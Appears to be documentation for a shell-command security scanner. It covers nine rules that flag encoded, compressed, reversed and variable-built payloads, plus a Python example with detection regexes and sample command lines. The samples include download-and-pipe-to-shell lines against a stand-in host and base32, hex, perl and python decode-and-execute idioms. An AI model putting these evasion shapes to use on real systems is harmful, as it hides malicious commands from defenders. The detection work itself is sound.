Encoding, Obfuscation & Evasion
Detects obfuscated payloads, encoded commands, and evasion techniques designed to bypass security scanners
9 rules in obfuscation_evasion.yml
HIGH: 8 | MEDIUM: 1
| Rule ID | Severity | Title | Description | Refs |
|---|---|---|---|---|
| base32_ | HIGH | Base32/Base16 Encoded Payload | base32 / base16 -d output is piped into sh/bash/python/perl. Encoding hides the payload from string-based detection until it reaches the interpreter. | |
| curl_ | HIGH | Downloaded File Execution | Downloads a file and executes it in the same command, so the payload runs before any inspection of the downloaded content can take place. | |
| env_ | HIGH | Environment Variable Constructed Command | Assembles a command from several environment variables so that no single variable holds a recognizable command string. | |
| gzip_ | HIGH | Compressed Payload Execution | Decompresses a payload and executes the result; the compressed bytes carry none of the plaintext patterns a scanner looks for. | |
| hex_ | HIGH | Hex-Encoded Payload Execution | Decodes a hex-encoded payload and executes it; the hex string matches none of the plaintext patterns a scanner looks for. | |
| perl_ | HIGH | Obfuscated Perl Code Execution | perl -e expression mixes eval with pack/unpack/chr or MIME::Base64::decode_base64. The shape decodes a hidden payload at runtime - a textbook AV evasion idiom. | |
| python_ | HIGH | Obfuscated Python Code Execution | Executes obfuscated Python code via exec(), compile(), or import tricks, typically on a payload decoded at runtime. | |
| variable_ | HIGH | Variable Indirection for Command Evasion | Builds a command at runtime from concatenated or indirectly expanded shell variables, so the final command string never appears in the source. | |
| rev_ | MEDIUM | Reversed String Evasion | Reverses an obfuscated string with rev at runtime so the forward form never appears in the command text. | |
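To make the rule families above concrete, here is an added example that is not the project's obfuscation_evasion.yml: hand-written regular expressions approximating what each family has to match, run over constructed command lines. The rule names, the regexes, and the sample commands are all assumptions made for this illustration; the env_ and variable_ families are folded into a single variable-concatenation check.

```python
"""Illustrative detectors for the obfuscation/evasion rule families.

Added example, not the project's own rules: every regex here is a hand-written
approximation (an assumption) of what the corresponding family has to match.
"""
import re

# Interpreters a decoded payload is typically piped into.
INTERP = r"(?:ba|z|da|k)?sh|python[23]?|perl|ruby|node"
# "... | sh", "... | python3": the rest of one pipeline stage, then a pipe into an interpreter.
PIPE_TO_INTERP = rf"[^|]*\|\s*(?:{INTERP})\b"

RULES = {
    # base32_ : base32/base16 -d output piped into an interpreter
    "base32_base16_decode": re.compile(
        rf"\bbase(?:32|16)\s+(?:-d|--decode)\b{PIPE_TO_INTERP}"),
    # hex_ : hex decoded with xxd -r -p and piped into an interpreter
    "hex_decode": re.compile(
        rf"\bxxd\s+(?:-r\s+-p|-p\s+-r)\b{PIPE_TO_INTERP}"),
    # gzip_ : decompressor output piped into an interpreter
    "compressed_payload": re.compile(
        rf"\b(?:gunzip|zcat|bzcat|xzcat|gzip\s+-dc?|xz\s+-dc?)\b{PIPE_TO_INTERP}"),
    # curl_ : download piped straight into an interpreter
    "downloaded_file_exec": re.compile(
        rf"\b(?:curl|wget)\b{PIPE_TO_INTERP}"),
    # rev_ : rev output piped into an interpreter, or rev inside $( ... )
    "reversed_string": re.compile(
        rf"\brev\b{PIPE_TO_INTERP}|\$\([^)]*\|\s*rev\b"),
    # perl_ : perl -e combining eval with pack/unpack/chr/decode_base64
    "obfuscated_perl": re.compile(
        r"\bperl\s+-e\b(?=.*\beval\b)(?=.*\b(?:pack|unpack|chr|decode_base64)\b)"),
    # python_ : python -c using exec()/compile()/__import__()
    "obfuscated_python": re.compile(
        r"\bpython[23]?\s+-c\b(?=.*\b(?:exec|compile|__import__)\s*\()"),
    # env_ / variable_ : two or more adjacent expansions ($a$b, ${X}${Y}) or ${!ref}
    "variable_concatenation": re.compile(
        r"(?:\$\{?[A-Za-z_]\w*\}?){2,}|\$\{![A-Za-z_]\w*\}"),
}


def scan(command: str) -> list[str]:
    """Return the names of every rule that fires on one command line (empty if none)."""
    return [name for name, rx in RULES.items() if rx.search(command)]


# Constructed sample command lines (not captured from any real incident).
SAMPLES = [
    "echo ONSWG4TFOQ====== | base32 -d | bash",
    "echo 6563686f2068690a | xxd -r -p | sh",
    "curl -s http://example.invalid/x.sh | sh",
    "echo H4sIAAAAAAAAA | base64 -d | gunzip | sh",
    "echo di | rev | sh",
    "perl -e 'eval(pack(\"H*\",\"7072696e742031\"))'",
    "python3 -c \"exec(__import__('base64').b64decode('cHJpbnQoMSk='))\"",
    "a=ba; b=sh; $a$b -c id",
    # A decoder inserted between download and interpreter: the curl rule is blind to it,
    # and only the base32 rule catches the line.
    "curl -s http://example.invalid/p | base32 -d | bash",
    # Benign lines that must not fire.
    "ls -la /var/log",
    "gzip -d archive.gz",
    "curl -s https://example.invalid/status | jq .",
    'echo "$HOME/bin"',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(f"{scan(line) or '-'}  {line}")
```

Two points worth noticing when running it. First, each "decode then pipe" rule only sees one pipeline stage, so `curl ... | base32 -d | bash` is missed by the download rule and caught only by the decode rule; the families overlap by design so that inserting one more stage does not create a blind spot. Second, the variable-concatenation check is the noisiest of the set: `"${dir}${file}"` in an ordinary path assembly matches it just as `$a$b` does, which is the usual reason such a rule is tuned against a corpus of known-benign scripts before it is trusted at HIGH severity.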